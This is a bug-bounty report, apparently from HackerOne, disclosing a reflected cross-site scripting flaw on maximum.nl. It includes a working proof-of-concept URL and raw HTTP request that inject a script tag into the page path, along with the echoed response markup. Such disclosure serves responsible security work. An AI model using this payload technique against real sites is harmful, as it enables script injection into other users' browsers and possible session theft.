Maximum: Cross-site Scripting (XSS) on [maximum.nl]

2017-05-12T19:17:58
ID H1:228006
Type hackerone
Reporter 0xradi
Modified 2017-05-24T09:08:59

Description

POC:

By visiting the following URL > https://maximum.nl/"><script>prompt("exr")</script><!--/index.php

Or preforming the showing request : ``` GET /"><script>prompt("exr")</script><!--/index.php HTTP/1.1 Host: maximum.nl User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cookie: laravel_session=eyJpdiI6Im94Uk52NHpxc3VKcFRoMThqRXZlRGc9PSIsInZhbHVlIjoiUWlqNk10dHNFclRcL1ZNNHJFWlZLWHhTQkNWbmlQd1pEMkFrRkJNSVpKYVlTajlLSlwvUllwWEhCYTNzckMzUVM2OVlkUStcL1BBbnVxMjVtcm51YUowdXc9PSIsIm1hYyI6ImRjMGYxNWFiNzE3MjZjYWMxOTdhY2EyMmVhYjhmYjE2ZTQyMTczYzk4Yjg2ODdlN2I0ZGY3NzgyMzFmM2YxODMifQ%3D%3D; _ga=GA1.2.1741493924.1494610209; _gid=GA1.2.1226624986.1494612538; _vwo_uuid_v2=58B280465974A9FE1B5DAF8815EA2396|02b9c0669e36dd7cd59d4a7a29ab29ef Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0

``` on Firefox, the JavaScript code injected inside the payload is correclty executed, as showed in the following snippet of response and as it is possible to see in the screenshot attached F184157.

```HTML

              &lt;meta property="og:image" content="https://maximum.nl/"&gt;&lt;script&gt;prompt("exr")&lt;/script&gt;&lt;!--/images/logo-maximum.png" /&gt;


&lt;title&gt;
  Employer Branding - Directe werving - Retentie | Maximum
&lt;/title&gt;

      &lt;link rel="shortcut icon" href="https://maximum.nl/"&gt;&lt;script&gt;prompt("exr")&lt;/script&gt;&lt;!--/favicon.ico"&gt;

&lt;link media="all" type="text/css" rel="stylesheet" href="https://maximum.nl/&quot;&gt;&lt;script&gt;prompt(&quot;exr&quot;)&lt;/script&gt;&lt;!--/css/main.css?1490352453"&gt;

```

Best Regards, @exr